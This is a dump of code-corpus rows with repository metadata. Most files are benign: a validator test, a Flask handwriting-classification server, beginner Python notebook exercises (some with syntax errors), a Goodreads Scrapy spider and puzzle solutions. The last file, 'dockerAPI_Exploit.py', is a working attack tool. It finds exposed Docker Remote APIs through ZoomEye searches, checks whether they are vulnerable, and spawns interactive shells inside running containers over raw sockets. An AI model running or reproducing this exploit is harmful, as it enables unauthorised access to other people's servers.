blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a46442916b41bb43efc65236b85e65474c9b6cbc
|
4058934db71013da9e5ccaaeb7e169dacc588b49
|
/cli/tests/test_validators.py
|
922f4062da4918b43eec378dbd12f26031c458eb
|
[
"MIT"
] |
permissive
|
zabaweb/lime-comb
|
c594f35724cc46f853f5a18a1310d9870610ba04
|
38c72b2f3ee1d9113d82e67c946a82d9d606dea8
|
refs/heads/master
| 2021-02-19T01:57:53.258141
| 2020-03-05T21:08:48
| 2020-03-05T21:08:48
| 245,265,936
| 0
| 0
|
MIT
| 2020-03-05T20:55:19
| 2020-03-05T20:55:18
| null |
UTF-8
|
Python
| false
| false
| 1,524
|
py
|
import builtins
from collections import defaultdict
from unittest.mock import MagicMock, patch
import lime_comb
import yaml
from lime_comb.validators.bool import validate_bool
from lime_comb.validators.email import lc_validate_email
from lime_comb.validators.file import validate_filepath
from .conftest import *
class TestValidator:
@pytest.mark.parametrize(
"file_path,raises", [("/etc/hosts", False), ("/no/such/file", True),],
)
def test_validate_filepath(self, file_path, raises):
if raises:
with pytest.raises(Exception):
validate_filepath(file_path)
else:
assert validate_filepath(file_path)
@pytest.mark.parametrize(
"value,raises",
[
("False", False),
("True", False),
("true", False),
("True", False),
(True, False),
(False, False),
("Some Value", True),
],
)
def test_validate_bool(self, value, raises):
if raises:
with pytest.raises(Exception):
validate_bool(value)
else:
assert None == validate_bool(value)
@pytest.mark.parametrize(
"email,raises",
[("llama", True), ("llama@llama", True), ("llama@llama.net", False),],
)
def test_lc_validate_email(self, email, raises):
if raises:
with pytest.raises(Exception):
lc_validate_email(email)
else:
lc_validate_email(email)
|
[
"marcin.niemira@gmail.com"
] |
marcin.niemira@gmail.com
|
8f370c96ccec3c3c4700881357f9a8ae1539b793
|
d6931f8347729ccff8535c90f5bd7f3a7ec331ee
|
/server.py
|
620ad22ddd3a227fbe30bac5d010f001810cfdb1
|
[
"MIT"
] |
permissive
|
vilmarzti/deepwriting
|
b237105d907a3eb702263c0d3a014e939fc8b181
|
9ba1feb7e472fea727761bc57d03b4f6cf417022
|
refs/heads/master
| 2021-07-14T05:04:23.924526
| 2020-10-17T15:23:48
| 2020-10-17T15:23:48
| 217,344,425
| 0
| 0
| null | 2019-10-24T16:29:13
| 2019-10-24T16:29:12
| null |
UTF-8
|
Python
| false
| false
| 2,553
|
py
|
from flask import Flask, escape, request
from flask_cors import CORS
from data_scripts.json_to_numpy import fetch_sample_from_dict, scale_zero_one
from data_scripts.preprocessing import process_dataset
from classify_hw import getModel, getConfig, process_result
import numpy as np
from source import data_utils
app = Flask(__name__)
cors = CORS(app)
alphabet = list(
"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'.,-()/"
) # %:;&# '\x00' character, i.e., ord(0) to label concatenations.
alphabet.insert(0, chr(0))
config_dict = getConfig()
@app.route('/', methods=["POST"])
def evaluate():
json = request.json
parsed_json = parse_json(json)
args = Args()
process_dataset(args, parsed_json, 'data_preprocessed')
model, sess, training_dataset = getModel(config_dict)
result = model.classify_given_sample(sess, np.array([training_dataset.data_dict['samples'][0]]))
processed_result = process_result(result[0], alphabet)
return processed_result
class Args:
def __init__(self):
self.amount_validation_samples = -1
self.data_file = ['/home/martin/Documents/code/python3/deepwriting-module/data/deepwriting_dataset/deepwriting-data.npz']
self.eoc_labels = False
self.fixed_length_chunks = None
self.merge_input_dictionaries_first = False
self.out_dir = '/home/martin/Documents/code/deepwriting-module/data/deepwriting_dataset'
self.out_file = ['data_preprocessed']
self.relative_representation = True
self.scale_data_zero_one = False
self.semantic_chunks_max_len = 0
self.standardize_data = True
self.translate_to_origin = True
def parse_json(json):
data_dict_1 = create_data_dict()
data_dict_2 = create_data_dict()
fetch_sample_from_dict(data_dict_1, json, False, False)
data_dict_2 = data_utils.dictionary_merge(
[data_dict_1, data_dict_2],
inplace_idx=0,
keys_frozen=['alphabet'],
verbose=0
)
data_dict_2 = scale_zero_one(data_dict_2)
return data_dict_2
def create_data_dict():
data_dict = {}
data_dict['samples'] = []
data_dict['char_labels'] = []
data_dict['word_labels'] = []
data_dict['subject_labels'] = []
data_dict['texts'] = []
data_dict['eow_labels'] = []
data_dict['bow_labels'] = []
data_dict['eoc_labels'] = []
data_dict['boc_labels'] = []
data_dict['alphabet'] = alphabet
return data_dict
def main():
app.run(port=5000)
if __name__ == "__main__":
main()
|
[
"villavicencio.martin@protonmail.com"
] |
villavicencio.martin@protonmail.com
|
fa49c7e396c61962996bf2618fcf092a10a9836f
|
793ea0a09f52886641f0eea5098f90235264726f
|
/Python weekend class_sindhuja.py
|
aa1587249129e3bb6a5fa18bb48aabd5ce8ff182
|
[] |
no_license
|
sindhujasankar/Weekend-python1_sindhuja
|
346f398700de03ab930d20b08c53f5ce00c524d2
|
4bbba73deda1a410726828c9dc497cf29e7c0eaf
|
refs/heads/master
| 2020-06-25T00:16:33.882482
| 2019-07-27T08:13:27
| 2019-07-27T08:13:27
| 199,136,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,959
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import sys
print sys.version
# In[2]:
import sys
print (sys.version)
# In[3]:
x=5
y=10
print(x+y)
# In[5]:
Description="Python is a interpreted language"
print(description)
# In[6]:
Description="Python is a interpreted language"
print(Description)
# In[7]:
first name="sindhuja"
print(first name)
# In[8]:
first_name="sindhuja"
print(first_name)
# In[9]:
first_name="sindhuja"
lasy_name="sankar"
print(first_name.title())
# In[10]:
name="sindhuja sankar"
print(name.upper())
# In[11]:
name="SINDHUJA SANKAR"
print(name.lower())
# In[12]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}"
# In[13]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}"
print(name)
# In[14]:
first_name="sindhuja"
last_name="sankar"
name=f "{first_name} {last_name}""
print(name)
# In[17]:
first_name='sindhuja'
last_name='sankar'
name=f" {first_name} {last_name} "
print(name)
# In[18]:
first_name="sindhuja"
last_name="sankar"
name=f" {first_name} {last_name} "
print(name)
# In[19]:
first_name="sindhuja"
last_name="sankar"
print(first_name,last_name)
# In[1]:
car_name="lamboghini/t/tford/tfreestyle"
print(car_name)
# In[2]:
car_name="lamboghini\t\tford\tfreestyle"
print(car_name)
# In[3]:
car_name="lamboghini\s\tford\tfreestyle"
print(car_name)
# In[6]:
briyani_hotel="yamoidheen\nRasavi\nParadise\nApplebees"
print(briyani_hotel)
# In[7]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.strip())
# In[11]:
Cartoon_names=" Dora bhuji mottu patlu "
pet_names="dolmacian"
print(Cartoon_names.strip(),pet_names)
# In[9]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.rstrip())
# In[10]:
Cartoon_names=" Dora bhuji mottu patlu"
print(Cartoon_names.lstrip())
# In[ ]:
|
[
"noreply@github.com"
] |
sindhujasankar.noreply@github.com
|
f9913f3556b1abaf280deef537f25348894732c1
|
bfc6aaa19134348e91501b6063c8cb79c9caa5d2
|
/quiz/fibonacci.py
|
80ef06bf2713b3a7a9d345858b16bf601ada1d70
|
[] |
no_license
|
siblackburn/python_bali
|
e6c590b8f98639379dc5d3aef7e36b3608bce7e9
|
2a13eae0cc983f09c364c8649397183cdf4bf600
|
refs/heads/master
| 2022-12-20T21:25:34.942452
| 2019-11-10T04:42:37
| 2019-11-10T04:42:37
| 215,207,276
| 0
| 0
| null | 2022-08-23T17:55:27
| 2019-10-15T04:33:23
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 246
|
py
|
sequence_length = int(input("how many fibonacci numbers do you want?"))
fib_numbers = [1,1]
while len(fib_numbers) < sequence_length:
new_numbers = fib_numbers[-2] + fib_numbers[-1]
fib_numbers.append(new_numbers)
print(fib_numbers)
|
[
"siblackburn@gmail.com"
] |
siblackburn@gmail.com
|
10661efc67a870bbba43ee9b9b447baf6e640a26
|
735bc64c867542c7494e8243e85f97397c81133d
|
/day6/puzzle1.py
|
66e33ed742c48de78686edcf8d039a91ab4e316e
|
[] |
no_license
|
SBird1337/sbird-aoc-2020
|
917910acf367396db3aa4034560801d2101f462c
|
f8d9d8567020fe313f1cad0b475e523740630681
|
refs/heads/master
| 2023-01-27T15:47:42.717262
| 2020-12-08T03:28:01
| 2020-12-08T03:28:01
| 318,240,756
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/bin/env python3
import os
groups = []
with open('day6/input12.txt', 'r') as f:
for group in f.read().split('\n\n'):
group = group.replace('\n', '')
groups.append(len("".join(set(group))))
print(sum(groups))
|
[
"philipp@karathan.at"
] |
philipp@karathan.at
|
48ba67277d3c5ef2ef26260e41518199f006f2c3
|
4aa971f59634c3e6aca66d9afa32a0dc12af246b
|
/suning/settings_test.py
|
bbf24e9285975203f9d30dadb86e43f13a881461
|
[] |
no_license
|
cash2one/wancloujia-o3m
|
613889779dd0c46e8444aed7e5a249a23e7c37aa
|
94645f103f4a366eb37a12be8634f0d61dd2a2f2
|
refs/heads/master
| 2021-01-19T12:35:18.581918
| 2015-10-02T11:27:11
| 2015-10-02T11:27:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 118
|
py
|
from suning.settings import *
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3'
}
}
|
[
"yangchen@jiaoyin.cm"
] |
yangchen@jiaoyin.cm
|
eff8bfc151e7d12e6301e1900b0daefd3667cd2c
|
4ca8df3a127e9b15cbfecea6505928741f685a63
|
/case_crawler/utils/common_tools.py
|
ef618a3b95e404c080d7df456778d067ac19dd4d
|
[] |
no_license
|
gongfei6644/gongfei
|
2beb082c56197bc23ca20a6927ff6c10d8beaa83
|
bfdd5e6a3a8d76ad1e43cf54df186b944cad29e4
|
refs/heads/master
| 2022-11-30T20:49:22.213040
| 2020-08-16T12:52:28
| 2020-08-16T12:52:28
| 286,283,597
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,210
|
py
|
# coding=utf-8
import hashlib
import re
import time
from functools import wraps
from w3lib.url import canonicalize_url
from setting import config
from utils.common_mysql import get_pagesize_config
website_pagesize = {}
log_path = config.LIST_LOG_DIR
def get_rand_guid(url, unit_price, ym):
# ym = datetime.datetime.now().strftime("%Y%m")
url = canonicalize_url(url)
full = "{}{}{}".format(url, unit_price, ym).encode("utf-8")
md5 = hashlib.md5()
md5.update(full)
guid = md5.hexdigest()
return guid
def check_cityname(city_name):
names = ['地区', '自治', '群岛', '县', '海域']
for name in names:
if name in city_name or city_name in {"阿拉善盟", "锡林郭勒盟", "兴安盟", "神农架林区"}:
result = city_name
break
else:
result = city_name if city_name.endswith("市") else city_name + "市"
return result
def make_urls(sub_info):
'''
通过片区的初始url生成片区所有页码的urls
'''
page_urls = []
total_pages = get_page_size(sub_info["source"], sub_info["city"])
if sub_info["source"] == "城市房产二手房":
page_urls = ["{}/pg{}/".format(
sub_info["sub_area_url"].strip("/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "链家二手房":
page_urls = ["{}/pg{}co32/".format(sub_info["sub_area_url"].replace(
"/co32/", ""), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "中国房产超市二手房":
page_urls = ["{}_p{}.html".format(
sub_info["sub_area_url"].replace(".html", ""), i + 1) for i in range(total_pages)]
elif sub_info["source"] == "房天下二手房":
sub_url = sub_info["sub_area_url"].replace("http:", "https:")
page_urls = ["{}-i3{}/".format(
sub_url.strip("/"), i + 1) if i else sub_url for i in range(total_pages)]
if sub_info['city'] == "北京市":
page_urls = [url.replace("esf1", "esf") + "?_rfss=1" for url in page_urls]
elif sub_info["source"] == "安居客二手房":
page_urls = ["{}/o5-p{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] + "o5/" for i in range(total_pages)]
elif sub_info["source"] == "中原地产二手房":
page_urls = ["{}/u7g{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] + "u7/" for i in range(total_pages)]
elif sub_info["source"] == "诸葛找房二手房":
page_urls = ["{}/page/{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "赶集网二手房":
page_urls = ["{}/pn{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "58同城二手房":
page_urls = ["{}/pn{}/".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
elif sub_info["source"] == "Q房网二手房":
page_urls = ["{}/f{}".format(sub_info["sub_area_url"].strip(
"/"), i + 1) if i else sub_info["sub_area_url"] for i in range(total_pages)]
return page_urls
def get_page_size(source, city_name):
'''
按网站来源,城市,获取网站最大采集页数
:param source:数据源网站
:param city_name:城市名
:return: page_size
'''
global website_pagesize
if website_pagesize == {}:
website_pagesize = get_pagesize_config()
first_tier_cities_list = {"北京市", "上海市", "广州市", "深圳市"}
city_key = "generic_city"
# 判断是否为一线城市
if city_name in first_tier_cities_list:
city_key = "first_tier_cities"
page_size = website_pagesize.get(source, {}).get(city_key, 30)
return page_size
class ClsSingleton():
"""单例基础类"""
def __new__(cls, *args, **kwargs):
if not hasattr(cls, '_the_instance'):
cls._the_instance = object.__new__(cls)
return cls._the_instance
def format_num(t):
"""数字元组转成数字"""
r = 0
if isinstance(t, tuple):
try:
for i, v in enumerate(t):
r += int(v) * 10 ** ((len(t) - 1 - i) * 3)
r = str(r)
except:
pass
elif isinstance(t, str):
r = t.replace(",", "")
else:
r = t
return r
def timeit(func):
"""定义装饰器的函数"""
@wraps(func)
def inner(*args, **kwargs):
"""内层函数"""
st = time.time()
result = func(*args, **kwargs)
et = time.time()
print("execute the function cost:{}".format(et - st))
return result
return inner
@timeit
def function(a):
"""被装饰函数"""
print("here is func, param is {}".format(a))
def format_date(date_str):
r = re.findall('更新于(.*日)')
if __name__ == '__main__':
function("000")
|
[
"1"
] |
1
|
3d138cb891362f309c9f1e0a25474de6ede5b5bf
|
6d9795fa1aafc0fa5316020aaa0eaa4f68b76229
|
/dashboard/admin.py
|
0cc378351808cb988c751a50626303004d51f468
|
[] |
no_license
|
icerahi/immolists
|
02d379a22c193e793b26e35828b5eebff33bf888
|
813333c3923385861f111bb7aa715aeb04108c3a
|
refs/heads/master
| 2022-12-15T15:00:39.844142
| 2022-01-06T10:06:44
| 2022-01-06T10:06:44
| 196,600,572
| 0
| 0
| null | 2022-11-22T04:14:43
| 2019-07-12T15:12:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 129
|
py
|
from django.contrib import admin
# Register your models here.
from accounts.models import Profile
admin.site.register(Profile)
|
[
"zanjarwhite@gmail.com"
] |
zanjarwhite@gmail.com
|
e5181625fe4c0c87d3fabc860eb6ed72d2377e55
|
1b405f2181960f63da9ea176be1ff9145b98d0d8
|
/webempresa/blog/urls.py
|
31f7b49977e5b76222d1e72a8028275658961476
|
[] |
no_license
|
mariogonzcardona/web-empresa-curso-django-2
|
15d5005eb639e1534e98b0bf1b0f3dae68a1fda5
|
f0b05bc9a1432b72a6b999df9b29545feefc0765
|
refs/heads/master
| 2020-12-12T15:15:32.978703
| 2020-01-15T21:35:43
| 2020-01-15T21:35:43
| 234,159,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django.urls import path
from . import views
urlpatterns = [
# Paths del core
path('', views.blog,name="blog"),
path('category/<int:category_id>/',views.category,name="category"),
]
|
[
"alejandrogonzalez@uadec.edu.mx"
] |
alejandrogonzalez@uadec.edu.mx
|
e00478f3ddb13e96aa3763bd2c854ff524a10299
|
2541edec51e7947a43546d5aaed9406b863d2968
|
/data/scraped/top_400_books/bestreads/spiders/bestreads_spider.py
|
68f309dffdf04582eb4161d532cf88707da3db36
|
[] |
no_license
|
claire-vk/GoodReads
|
55dca9ca510ac3bd7ada5274696fedab0f767ff0
|
4a44899fd0ab65e886a637c91ead0d59b0ddb677
|
refs/heads/master
| 2021-07-10T14:41:32.488455
| 2020-03-29T21:46:34
| 2020-03-29T21:46:34
| 90,575,384
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,509
|
py
|
from bestreads.items import BestreadsItem
import scrapy
import re
from scrapy.selector import Selector
class bestreads_spider(scrapy.Spider):
name = 'bestreads'
allowed_urls = ['https://www.goodreads.com/']
# 'best books ever' list includes more than 48,000 books - will focus on top 500 for analysis
rootURL = 'https://www.goodreads.com/list/show/1.Best_Books_Ever?page='
start_urls = [rootURL + str(i) for i in range(1,5)]
# # for debug
# start_urls = ['https://www.goodreads.com/list/show/1.Best_Books_Ever?page=1',
# 'https://www.goodreads.com/list/show/1.Best_Books_Ever?page=2']
def verify(self, content):
if isinstance(content, list):
if len(content) > 0:
content = content[0]
# convert unicode to str
return content.encode('ascii','ignore')
else:
return ""
else:
# convert unicode to str
return content.encode('ascii','ignore')
def parse(self, response):
books = response.xpath('//*[@id="all_votes"]/table/tr').extract()
# i=0
for book in books:
ranking = Selector(text=book).xpath('//td[@class="number"]/text()').extract()[0]
ranking = self.verify(ranking)
totalscore = Selector(text=book).xpath('//span[@class="smallText uitext"]/a/text()').extract()[0]
totalscore = re.search('.*:\s(\d*,*\d*,*\d*)', totalscore).group(1)
totalscore = self.verify(totalscore)
url = Selector(text=book).xpath('//a[@class="bookTitle"]/@href').extract()
pageurl = 'https://www.goodreads.com' + url[0]
item = BestreadsItem()
item['Ranking'] = ranking
item['TotalScore'] = totalscore
request = scrapy.Request(pageurl, callback=self.parse_each)
request.meta['item'] = item
yield request
# i+=1
# if i==1:
# break
def parse_each(self, response):
item = response.meta['item']
Title = response.xpath('//div[@class="last col"]/h1/text()').extract_first()
Title = Title.strip()
Title = self.verify(Title)
Author = response.xpath('//div[@class="last col"]/div/span/a/span/text()').extract_first()
Author = self.verify(Author)
Score = response.xpath('//span[@class="average"]/text()').extract_first()
Score = self.verify(Score)
NumberOfRating = response.xpath('//a[@class="actionLinkLite votes"]/span/@title').extract_first()
NumberOfRating = self.verify(NumberOfRating)
NumberOfReviews = response.xpath('//a[@class="actionLinkLite"]/span/span/@title').extract_first()
NumberOfReviews = self.verify(NumberOfReviews)
NumberOfPages = response.xpath('//span[@itemprop="numberOfPages"]/text()').extract_first()
NumberOfPages = re.search('(\d*)\s*pages', NumberOfPages).group(1)
NumberOfPages = self.verify(NumberOfPages)
# looking only at the main genre (i.e. genre under which most of users classified the book)
MainGenre = response.xpath('//a[@class="actionLinkLite bookPageGenreLink"]/text()').extract()
MainGenre = self.verify(MainGenre)
# list of all the genres
allgenres = response.xpath('//div[@class="bigBoxBody"]/div/div/div[@class="left"]').extract()
AllGenres = []
# i=0
for genre in allgenres:
genre_path = Selector(text = genre).xpath('//a[@class="actionLinkLite bookPageGenreLink"]/text()').extract()
AllGenres.append(genre_path)
# i+=1
# if i==1:
# break
AllGenres = reduce(lambda x,y: x+y, AllGenres)
AllGenres = ','.join(AllGenres).strip()
AllGenres = self.verify(AllGenres)
Description = response.xpath('//div[@class="readable stacked"]/span/text()').extract_first()
Description = ''.join(Description).strip()
Description = self.verify(Description)
Year = response.xpath('//div[@class="uitext stacked darkGreyText"]/div/text()').extract()
Year = ''.join(Year)
try:
Year = re.search('.*(\d{4}).*', Year ).group(1)
except:
Year = ''
finally:
Year = self.verify(Year)
BookCover = response.xpath('//div[@class="bookCoverContainer"]/div/a/@href').extract()
BookCoverURL = ['https://www.goodreads.com'+ id_ for id_ in BookCover]
BookCoverURL = self.verify(BookCoverURL)
# long reviews have a different path than short reviews. Need to account for that
reviews = response.xpath('//*[@id="bookReviews"]/div[@class="friendReviews elementListBrown"]').extract()
Reviews = []
# i=0
for review in reviews:
review_path = Selector(text = review).xpath('//span[@class="readable"]/span[@style="display:none"]/text()').extract()
if review_path == []:
review_path = Selector(text = review).xpath('//span[@class="readable"]/span/text()').extract()
Reviews.append(review_path)
else:
Reviews.append(review_path)
# i+=1
# if i==1:
# break
# concatenating all reviews together and grabbing the first few paragraphs. Note: only looking at top 30 reviews.
Reviews = reduce(lambda x,y: x+y, Reviews)
Reviews = ''.join(Reviews).strip()
Reviews = self.verify(Reviews)
# # concatenating all reviews together and grabbing the first few paragraphs. Note: only looking at top 30 reviews.
# Reviews = response.xpath('//div[@class="reviewText stacked"]/span/span[1]/text()').extract()
# Reviews = ''.join(Reviews).strip()
# Reviews = self.verify(Reviews)
item['Title'] = Title
item['Author'] = Author
item['Score'] = Score
item['NumberOfRating'] = NumberOfRating
item['NumberOfReviews'] = NumberOfReviews
item['NumberOfPages'] = NumberOfPages
item['MainGenre'] = MainGenre
item['AllGenres'] = AllGenres
item['Description'] = Description
item['Year'] = Year
item['BookCoverURL'] = BookCoverURL
item['Reviews'] = Reviews
yield item
|
[
"claire.emmanuelle.vignon@gmail.com"
] |
claire.emmanuelle.vignon@gmail.com
|
d662c5c1d517d4f8392df31a97a092976af330d8
|
d66818f4b951943553826a5f64413e90120e1fae
|
/hackerearth/Algorithms/El Nino !/solution.py
|
7ae3ddfd098634f2b9eecc6f17cbdd95c51f04b9
|
[
"MIT"
] |
permissive
|
HBinhCT/Q-project
|
0f80cd15c9945c43e2e17072416ddb6e4745e7fa
|
19923cbaa3c83c670527899ece5c3ad31bcebe65
|
refs/heads/master
| 2023-08-30T08:59:16.006567
| 2023-08-29T15:30:21
| 2023-08-29T15:30:21
| 247,630,603
| 8
| 1
|
MIT
| 2020-07-22T01:20:23
| 2020-03-16T06:48:02
|
Python
|
UTF-8
|
Python
| false
| false
| 838
|
py
|
"""
# Sample code to perform I/O:
name = input() # Reading input from STDIN
print('Hi, %s.' % name) # Writing output to STDOUT
# Warning: Printing unwanted or ill-formatted data to output will cause the test cases to fail
"""
# Write your code here
from itertools import accumulate
n, m = map(int, input().strip().split())
a = list(map(int, input().strip().split()))
parents = list(map(int, input().strip().split()))
counter = [0 for i in range(n + 1)]
for i in a:
if i <= n:
counter[i] += 1
tree = [[] for i in range(n + 1)]
for i, v in enumerate(parents):
tree[v].append(i + 2)
counter = list(accumulate(counter))
ans = 0
stack = [(1, 0)]
while stack:
node, lvl = stack.pop()
ans += counter[lvl]
for next_node in tree[node]:
stack.append((next_node, lvl + 1))
print(ans)
|
[
"hbinhct@gmail.com"
] |
hbinhct@gmail.com
|
fbf42987cfcf599e54f64fd155b682121131248b
|
018c69e6bfa85a509f6c4ced89d9ecc39c695612
|
/dockerAPI_Exploit.py
|
a5624786b4628e95f51abe6d56c9b8dea08e2554
|
[] |
no_license
|
comahax/Docker-Remote-API-Exploit
|
13f2e3e672bb123e9824e9e4f809499c74ecbc46
|
0275e2ef65df332ce2c4374ab49e74a8cec7fe38
|
refs/heads/master
| 2020-05-23T08:00:09.829117
| 2016-09-13T15:08:32
| 2016-09-13T15:08:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,447
|
py
|
# -*- coding:utf-8 -*-
import requests
import urlparse
import argparse
import json
import socket
import time
import sys
class scan():
def __init__(self):
self.VulnerabilityIp = []
def Check(self,url):
Check_Url = url+'containers/json'
try:
TestRe = requests.get(Check_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
return 1
if 'server' in TestRe.headers.keys():
if 'Docker' in TestRe.headers['server'] and 'Command' in TestRe.text:
print "\33[31m%s :vulnerability\33[0m" %url
self.VulnerabilityIp.append(url)
else:
print '%s :not vulnerable' %url
else:
print '%s :not vulnerable' %url
def Getshell(self,url,host,port):
GetShell_Url = url+'containers/json?all=1'
count = 0
try:
TestRe = requests.get(GetShell_Url,timeout = 5)
except:
print "Can not connect URL Timeout!"
exit()
date = TestRe.text
decoded = json.loads(date)
CtrlDocter = []
AccCommand = ['sh', '/bin/sh', '/bin/bash', 'bash', '/bin/csh', 'csh','/bin/ksh', 'ksh', '/bin/tcsh', 'tcsh', '/bin/zsh', 'zsh']
for entries in decoded:
if ("Up" in entries['Status']) and ("Exited" not in entries['Status']) and (entries['Command'] in AccCommand):
count+=1
ID = count
DockerID =entries['Id']
Name = entries['Names']
Image = entries['Image']
Command = entries['Command']
detailed = {'ID':str(ID) , 'Name' :Name[0] ,'Image':Image , 'Command' : Command, 'DockerID' : DockerID}
CtrlDocter.append(detailed)
if count:
print "Control Container Number:%s" %count
for i in CtrlDocter:
print ""
for key , value in i.items():
print "\33[31m"+key+":"+value+"\33[0m"
else:
print "No Container Can Control"
return
print 'Input exit to leave'
while True:
CtrlId = raw_input("Input Container ID:")
if CtrlId == 'exit':
break
Command = CtrlDocter[int(CtrlId) - 1]['Command']
CtrlSId = CtrlDocter[int(CtrlId) - 1]['DockerID'][0:12]
PostUrl = url+'v1.20/containers/'+CtrlSId+'/exec'
HEADER= {
'User-Agent':'Docker-Client/1.8.0 (windows)',
'Content-Length':156,
'Content-Type':'application/json',
'Accept-Encoding':'gzip'}
payload = '{"Tty": true, "Detach": false, "Container": "%s", "User": "", "AttachStdin": true, "Cmd": ["%s"], "AttachStderr": true, "Privileged": false, "AttachStdout": true}' %(CtrlSId,Command)
re = requests.post(PostUrl, headers=HEADER, data = payload)
decoded = json.loads(re.text)
CreatedId = decoded['Id']
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (host, int(port))
sock.connect(server_address)
execDockerPOSTtwo = '''\
POST /v1.20/exec/CreatedId/start HTTP/1.1
Host: 115.123.123.79:2375
User-Agent: Docker-Client/1.8.0 (windows)
Content-Length: 163
Connection: Upgrade
Content-Type: text/plain
Upgrade: tcp
{"User":"","Privileged":false,"Tty":true,"Container":"ContainerId","AttachStdin":true,"AttachStderr":true,"AttachStdout":true,"Detach":false,"Cmd":["Command"]}
'''
execDockerPOSTtwo = execDockerPOSTtwo.replace('ContainerId', CtrlSId).replace('Command', Command)
execDockerPOSTtwo = execDockerPOSTtwo.replace("CreatedId", CreatedId)
time.sleep(1)
sock.sendall(execDockerPOSTtwo)
startinfo = sock.recv(1024*10)
while True:
cmd = raw_input('$:')
sock.sendall(cmd+'\x0d')
time.sleep(2)
if cmd == "exit":
break
print sock.recv(1024*10)
sock.close()
def Panel_Scan(self,Search_keyword,PageNum):
GetTokenUrl = 'https://api.zoomeye.org/user/login'
userinfo ={"username": "username",
"password": "password"}
tokenrl = requests.post(GetTokenUrl,data = json.dumps(userinfo),verify=False)
data = eval(tokenrl.text)
Header = {'Authorization': 'JWT %s' %data['access_token']}
page = 1
TestIpArgs = []
if(Search_keyword == None):
key = 'port:2375 X-Content-Type-Options: nosniff country:"CN"'
else:
key = Search_keyword
while True:
try:
Searchurl = 'https://api.zoomeye.org/host/search?query=%s&page=%s'%(key,str(page))
print 'Search in page :'+str(page)
Searchre = requests.get(Searchurl,headers = Header,verify=False)
GetData = json.loads(Searchre.text)
if PageNum != None:
if page < int(PageNum):
page+=1
else:
break
else:
page+=1
for i in GetData['matches']:
TestIpArgs.append(i['ip'])
except Exception,e:
if str(e.message) == 'matches':
break
print 'Start Test...'
file = open('success.txt','w+')
for TestIp in TestIpArgs:
TestIp = 'http://'+TestIp+':2375/'
print 'test:\t'+TestIp
self.Check(TestIp)
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
file.writelines(IP+'\n')
file.close()
def filescan(self,filepath):
file = open(filepath,'r')
data = file.readlines()
for line in data:
line=line.strip('\n')
self.Check(line)
file.close()
if len(self.VulnerabilityIp):
print str(len(self.VulnerabilityIp))+' Vulnerability Url have found'
else:
print 'No Vulnerability Url found'
for IP in self.VulnerabilityIp:
print IP
def filegetshell(self,filepath):
file = open(filepath,'r')
data = file.readlines()
count = 0
urlargs = []
for line in data:
count+=1
line = line.strip('\n')
TmpUrl = urlparse.urlparse(line)
host= TmpUrl.netloc.split(':')
detail = {'ID':count,'host':host[0],'port':host[1],'url':line}
urlargs.append(detail)
print detail
while True:
num = raw_input('UrlID:')
if num == 'exit':
break
self.Getshell(urlargs[int(num)-1]['url'], urlargs[int(num)-1]['host'],urlargs[int(num)-1]['port'])
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('-u', dest = 'url' , help = 'example:http://111.222.333.444:2375/')
parse.add_argument('-c', dest = 'check' , action = 'store_true', default = False , help = 'check')
parse.add_argument('-g',dest = 'getshell' , action = 'store_true' , default = False , help = 'getshell')
parse.add_argument('-f',dest = 'zoomeye',action = 'store_true',default = False,help = 'Whether Use Zoomeye')
